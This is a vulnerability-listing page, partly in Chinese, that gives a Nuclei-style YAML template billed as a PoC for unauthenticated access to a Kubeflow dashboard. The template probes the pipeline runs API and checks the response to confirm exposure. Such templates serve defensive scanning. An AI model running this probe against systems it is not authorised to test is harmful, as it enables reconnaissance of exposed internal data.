kubeflow-dashboard-unauth: Kubeflow Unauth

日期: 2025-08-01 | 影响软件: Kubeflow | POC: 已公开

漏洞描述

Kubeflow internal data is exposed.

PoC代码[已公开]

id: kubeflow-dashboard-unauth

info:
  name: Kubeflow Unauth
  author: dhiyaneshDk
  severity: high
  description: Kubeflow internal data is exposed.
  reference:
    - https://github.com/kubeflow/kubeflow
  metadata:
    max-request: 1
  tags: kubeflow,unauth,misconfig,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/pipeline/apis/v1beta1/runs?page_size=5&sort_by=created_at%20desc'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{"runs":[{"id":'
          - 'resource_references'
        condition: and
        part: body

      - type: word
        words:
          - "application/json"
        part: header

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ce0dc7be709788bae583c88eef7f00356f73be9638531cd55b2b2e9d21b5b97a0220110f49a7949d090c44c0728571c898a85cebaae329dbf747d2f1525f86518563:922c64590222798bb761d5b6d8e72950

相关漏洞推荐